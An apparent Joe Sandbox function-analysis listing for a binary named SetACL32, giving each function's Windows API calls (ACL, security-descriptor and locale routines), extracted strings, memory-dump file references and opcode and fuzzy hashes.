                • EnumSystemLocalesW.KERNEL32(00F99B73,00000001,00000000,?,-00000050,?,00F9A1A1,00000000,?,?,?,00000055,?), ref: 00F99ABF
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem
                • String ID:
                • API String ID: 2417226690-0
                • Opcode ID: 2bd3b8fc4c1bdc6d043d9e24cc2664c2d6f1784dfe3cbec5cfa2d9cd9af4c99a
                • Instruction ID: 744ecf41c88ff94f25130046b9539edb5d223965e51bd59d6eb14d30c121bb12
                • Opcode Fuzzy Hash: 2bd3b8fc4c1bdc6d043d9e24cc2664c2d6f1784dfe3cbec5cfa2d9cd9af4c99a
                • Instruction Fuzzy Hash: CD1129376083055FEF189F39D89167AB791FF80368B15442CE94687A40D3B5A902D740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F99FF2 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F99D8F,00000000,00000000,?), ref: 00F9A01E
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$InfoLocale
                • String ID:
                • API String ID: 3736152602-0
                • Opcode ID: e04c0e276e78fbfb53ec2d8b973ffddf90514e8cf3319d66d6986e96bde877ad
                • Instruction ID: 514ed755ad9435c0a54350752cde3819d89b1538a73b0f6fcadb7593f3956043
                • Opcode Fuzzy Hash: e04c0e276e78fbfb53ec2d8b973ffddf90514e8cf3319d66d6986e96bde877ad
                • Instruction Fuzzy Hash: D6F0A936E10215AFEF285B658C05BBA7768EB40764F150428EC15A3190DA75FD41E5D1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F99AE8 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • EnumSystemLocalesW.KERNEL32(00F99DC6,00000001,?,?,-00000050,?,00F9A165,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F99B32
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem
                • String ID:
                • API String ID: 2417226690-0
                • Opcode ID: 62416975661e3339be15412c74def16c6953bc74c5e72dfe5c9274998d84c5cf
                • Instruction ID: be97d693e366a6f8451cf316d33bf2ae6db8221d534d69a7e9a29bd1a5972b05
                • Opcode Fuzzy Hash: 62416975661e3339be15412c74def16c6953bc74c5e72dfe5c9274998d84c5cf
                • Instruction Fuzzy Hash: 63F0F6362043055FEF245F39AC81A7ABB95EFC1368B16442DF9458B680D6F59D02EA50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9A2C3 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F94E5F: EnterCriticalSection.KERNEL32(?,?,00F94345,?,00FC70B0,0000000C), ref: 00F94E6E
                • EnumSystemLocalesW.KERNEL32(00F9A2B6,00000001,00FC7290,0000000C,00F9A702,00000000), ref: 00F9A2FB
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalEnterEnumLocalesSectionSystem
                • String ID:
                • API String ID: 1272433827-0
                • Opcode ID: 76f6c7368a0265649788e5ee066a56fd1d317a8af1494a31ba006b87cf1f6a7a
                • Instruction ID: aebb2db19edf16bcafa733a0f4d00c5b19e27c1472416b28b807ccbb492730cd
                • Opcode Fuzzy Hash: 76f6c7368a0265649788e5ee066a56fd1d317a8af1494a31ba006b87cf1f6a7a
                • Instruction Fuzzy Hash: 87F03C76A443199FEB10EF58D942B9D77B0EB45721F10401AF814972A0CBBA9941AF81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F99A02 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • EnumSystemLocalesW.KERNEL32(00F9995B,00000001,?,?,?,00F9A1C3,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F99A39
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$EnumLocalesSystem
                • String ID:
                • API String ID: 2417226690-0
                • Opcode ID: e3e474e1a1c0270313a58156cb713ca17e8e56ee04dd265e73e789ed2afcb7dd
                • Instruction ID: 304506cb913b61b2d6e5dfddf47e9ace3f4cb48c1530adb3e43e90635878699e
                • Opcode Fuzzy Hash: e3e474e1a1c0270313a58156cb713ca17e8e56ee04dd265e73e789ed2afcb7dd
                • Instruction Fuzzy Hash: 7AF05C3530020557DF149F7AD8456667F50EFC2720B07405DEE058B141C275D843D790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9A806 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00F9074F,?,20001004,00000000,00000002,?,?,00F8FD3A), ref: 00F9A83A
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID:
                • API String ID: 2299586839-0
                • Opcode ID: 6142097ef75281b98971db363b911166029df55b785ea9062d9f2eec00b4e6ef
                • Instruction ID: 2c81f2238641df306905cc7366c11e9481cc172898d360e1951a36f2291885b4
                • Opcode Fuzzy Hash: 6142097ef75281b98971db363b911166029df55b785ea9062d9f2eec00b4e6ef
                • Instruction Fuzzy Hash: B7E04F3250022CBBDF122F61DC04FAE3E25EF44760F004021FC1566161DB769D21BAD6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FA0336 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 9129b5c5acd562e01b733c1c6452ce3e431c62711147a324b4f6dce8020ea1d5
                • Instruction ID: c7b4fad67394afca7672a7dc787997355e7b44615c49f24c6697ba3452b5b8f8
                • Opcode Fuzzy Hash: 9129b5c5acd562e01b733c1c6452ce3e431c62711147a324b4f6dce8020ea1d5
                • Instruction Fuzzy Hash: 5AA02470101115CF53004F30DF0730C35DC7F051D1F0040555000C3130D73044407745
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9CB92 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7dc7687f6601a633c8fe2334c9b8228b73b0a36f5faf86b077d4ca6c010f5fd7
                • Instruction ID: 534ca4e6334354cc0adb6f9cc54e2bd38739ddaff7ba4b207d65dc66b86b3044
                • Opcode Fuzzy Hash: 7dc7687f6601a633c8fe2334c9b8228b73b0a36f5faf86b077d4ca6c010f5fd7
                • Instruction Fuzzy Hash: 4AE08C72A21228EBCB15DFC8C94598AF3ECFB88B50B1540A7F511D3250C274DE00E7D0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F833E0 Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 306memoryCOMMON
                Download Yara Rule
                APIs
                • IsValidSecurityDescriptor.ADVAPI32(?,746D712B,00000000,00000000,00000000), ref: 00F83411
                • SysAllocString.OLEAUT32(__systemsecurity=@), ref: 00F83459
                • SysAllocString.OLEAUT32(__systemsecurity), ref: 00F834AC
                • SysAllocString.OLEAUT32(SetSD), ref: 00F83526
                • GetSecurityDescriptorLength.ADVAPI32(?), ref: 00F835A6
                • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00F835BA
                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F835D6
                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00F835F6
                • VariantInit.OLEAUT32(?), ref: 00F83600
                • VariantClear.OLEAUT32(?), ref: 00F83640
                • VariantClear.OLEAUT32(?), ref: 00F83679
                • SysFreeString.OLEAUT32(77B5D4FF), ref: 00F836E2
                • _com_issue_error.COMSUPP ref: 00F83767
                • _com_issue_error.COMSUPP ref: 00F83771
                • _com_issue_error.COMSUPP ref: 00F8377B
                • _com_issue_error.COMSUPP ref: 00F83785
                • _com_issue_error.COMSUPP ref: 00F8378F
                • _com_issue_error.COMSUPP ref: 00F83799
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _com_issue_error$String$AllocArraySafeVariant$ClearDataDescriptorSecurity$AccessCreateFreeInitLengthUnaccessValid
                • String ID: Put failed, returned 0x%x$SetSD$\\.\$__systemsecurity$__systemsecurity=@
                • API String ID: 1425945781-386781740
                • Opcode ID: 2d1e7eb9edd789aa8128a6a06be13f41a6b7f94de9ae513c7afc84d55f3de920
                • Instruction ID: e97a65b4c8f97b3752e00c2ce7f92f3fa5425911aa1a058902f8c86f5ce179db
                • Opcode Fuzzy Hash: 2d1e7eb9edd789aa8128a6a06be13f41a6b7f94de9ae513c7afc84d55f3de920
                • Instruction Fuzzy Hash: A4B162B1E00219EFEB10EFA4CC45BDEBBB8AF04B10F144559E914EB291D775DA04DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F837A0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 265memoryCOMMON
                Download Yara Rule
                APIs
                • SysAllocString.OLEAUT32(__systemsecurity=@), ref: 00F83801
                • SysAllocString.OLEAUT32(GetSD), ref: 00F83854
                • SysAllocString.OLEAUT32(00FBFF98), ref: 00F838DC
                • VariantInit.OLEAUT32(?), ref: 00F83903
                • SafeArrayGetLBound.OLEAUT32(00000000,00000001,?), ref: 00F83951
                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00F83967
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F83985
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F839C1
                • VariantClear.OLEAUT32(?), ref: 00F839D2
                • SysFreeString.OLEAUT32(-00000001), ref: 00F83A2E
                • _com_issue_error.COMSUPP ref: 00F83AB6
                • _com_issue_error.COMSUPP ref: 00F83AC0
                • _com_issue_error.COMSUPP ref: 00F83ACA
                • _com_issue_error.COMSUPP ref: 00F83AD4
                • _com_issue_error.COMSUPP ref: 00F83ADE
                • _com_issue_error.COMSUPP ref: 00F83AE8
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _com_issue_error$ArraySafeString$Alloc$BoundDataVariant$AccessClearFreeInitUnaccess
                • String ID: GetSD$__systemsecurity=@
                • API String ID: 1002945065-3672729512
                • Opcode ID: 21f13a996173b1c7ef447298b8001ff2c48c37c5d6dcb4408ecae03cb6006844
                • Instruction ID: 2e6b1fa119302097f5f1859b997496d19e9d8eb6b6184101bea51879f7059f16
                • Opcode Fuzzy Hash: 21f13a996173b1c7ef447298b8001ff2c48c37c5d6dcb4408ecae03cb6006844
                • Instruction Fuzzy Hash: 5FA16FB1D0030AEBEB10EFA5CD45BDEBBF8AF04710F104529E515A72A1D779DA04EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F70AA4 Relevance: 30.2, APIs: 6, Strings: 11, Instructions: 471COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F70AAA
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                • std::locale::_Init.LIBCPMT ref: 00F70B1A
                • std::locale::_Init.LIBCPMT ref: 00F70B6C
                • std::locale::_Init.LIBCPMT ref: 00F70C3F
                • std::locale::_Init.LIBCPMT ref: 00F70C91
                • std::locale::_Init.LIBCPMT ref: 00F71019
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::locale::_$Init$Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocale
                • String ID: 0$Prepare$T$X$You specified inheritance flags, which is incompatible with man_docs. Your flags are being ignored in order to be able to set stan$full$man_docs$man_printer$manage_documents$manage_printer$print
                • API String ID: 1949052339-2776946339
                • Opcode ID: cd42686bb67832b10ab6848109d81a5cdd749557d71c0650284fe10dc2186d0e
                • Instruction ID: db32377fcbdd590ecbc04757e740c075beef62f309dfe4ef34bea1bb3a471778
                • Opcode Fuzzy Hash: cd42686bb67832b10ab6848109d81a5cdd749557d71c0650284fe10dc2186d0e
                • Instruction Fuzzy Hash: 4B12BB71E00258CFDB24DB68CC85BDDB7B1AF45304F14809AD949AB382DB75AE84EF52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F83120 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 187COMMON
                Download Yara Rule
                APIs
                • IsValidAcl.ADVAPI32(?,?,?,00000000), ref: 00F83161
                • GetAce.ADVAPI32(?,?,00000000,?,?,00000000), ref: 00F83178
                • GetLastError.KERNEL32(?,?,00000000), ref: 00F83182
                • DeleteAce.ADVAPI32(?,?,?,?,00000000), ref: 00F831A6
                • GetLastError.KERNEL32(?,?,00000000), ref: 00F831B0
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$DeleteValid
                • String ID: @M)w
                • API String ID: 2912457363-1211491014
                • Opcode ID: a6dbd11af4f255c62ac00785a043da53049389fa91596b9def9bdebf44dda5f4
                • Instruction ID: 9a7e24df92f4a2fb72d2193763217797f9a57c60284e97ed810f8664c20c926d
                • Opcode Fuzzy Hash: a6dbd11af4f255c62ac00785a043da53049389fa91596b9def9bdebf44dda5f4
                • Instruction Fuzzy Hash: D161A3B0E05249AFDB119FA4CC95FFF7BB8BF09710F044458E901A3251D7749A04EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F82F70 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 140COMMON
                Download Yara Rule
                APIs
                • IsValidAcl.ADVAPI32(?,?,?,00000000), ref: 00F82FB4
                • GetAclInformation.ADVAPI32(?,00000000,0000000C,00000002,?,?,00000000), ref: 00F82FCB
                • GetLastError.KERNEL32(?,?,00000000), ref: 00F82FD5
                • GetLengthSid.ADVAPI32(00000000,?,?,00000000), ref: 00F82FE6
                • GetLastError.KERNEL32(00000000), ref: 00F83003
                • GetLastError.KERNEL32 ref: 00F830FA
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$InformationLengthValid
                • String ID: @M)w
                • API String ID: 2808191216-1211491014
                • Opcode ID: fcbe7968a7a68dfda3c40d6d1a2d468dd82fa4430e3f5de88bff49f772e98397
                • Instruction ID: f76ec108bf1615c7853ecf57d527010e5f4556888e5ecfee38ca70fd7076c5d9
                • Opcode Fuzzy Hash: fcbe7968a7a68dfda3c40d6d1a2d468dd82fa4430e3f5de88bff49f772e98397
                • Instruction Fuzzy Hash: 234191B1E042199BDF10AFA4DC49AFF77B8BF05B14F044159E902A7251D7749A01EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F89350 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 229COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F89383
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                • std::locale::_Init.LIBCPMT ref: 00F893DA
                • std::locale::_Init.LIBCPMT ref: 00F89431
                • std::locale::_Init.LIBCPMT ref: 00F89483
                • std::locale::_Init.LIBCPMT ref: 00F894DA
                • std::locale::_Init.LIBCPMT ref: 00F89531
                • std::locale::_Init.LIBCPMT ref: 00F89584
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::locale::_$Init$Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocale
                • String ID: Font Driver Host$IIS AppPool$NT AUTHORITY$NT SERVICE$NT VIRTUAL MACHINE$WINDOW MANAGER
                • API String ID: 1949052339-1101167501
                • Opcode ID: 01d7670d53792d135a801c501834ca384eed638949baed86002ea2660948dddc
                • Instruction ID: 214d760d3d86968bc1282c3a5608e188c737b012b9b03d9298abb365d962078c
                • Opcode Fuzzy Hash: 01d7670d53792d135a801c501834ca384eed638949baed86002ea2660948dddc
                • Instruction Fuzzy Hash: D281C0B1F016059FCB10EF64D840BBEB7A5AB85724F184268D841AF3C5DBB69E06A790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F94F46 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$Info
                • String ID:
                • API String ID: 2509303402-0
                • Opcode ID: 62b9533f205f012bd570a7f9f60ff8f5ff85c993981218546cfe83d1d43968cd
                • Instruction ID: 5612105e2d9b59543d1a10f115d3247b704ed8e2b931bfc1169a25e42c467d0b
                • Opcode Fuzzy Hash: 62b9533f205f012bd570a7f9f60ff8f5ff85c993981218546cfe83d1d43968cd
                • Instruction Fuzzy Hash: 2ED1FF71D007059FEF22DFA8C881BEEBBF5BF09710F544129E494A7292DB74A845EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F985DB Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ___free_lconv_mon.LIBCMT ref: 00F9861F
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F9748F
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974A1
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974B3
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974C5
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974D7
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974E9
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F974FB
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F9750D
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F9751F
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F97531
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F97543
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F97555
                  • Part of subcall function 00F97472: _free.LIBCMT ref: 00F97567
                • _free.LIBCMT ref: 00F98614
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • _free.LIBCMT ref: 00F98636
                • _free.LIBCMT ref: 00F9864B
                • _free.LIBCMT ref: 00F98656
                • _free.LIBCMT ref: 00F98678
                • _free.LIBCMT ref: 00F9868B
                • _free.LIBCMT ref: 00F98699
                • _free.LIBCMT ref: 00F986A4
                • _free.LIBCMT ref: 00F986DC
                • _free.LIBCMT ref: 00F986E3
                • _free.LIBCMT ref: 00F98700
                • _free.LIBCMT ref: 00F98718
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
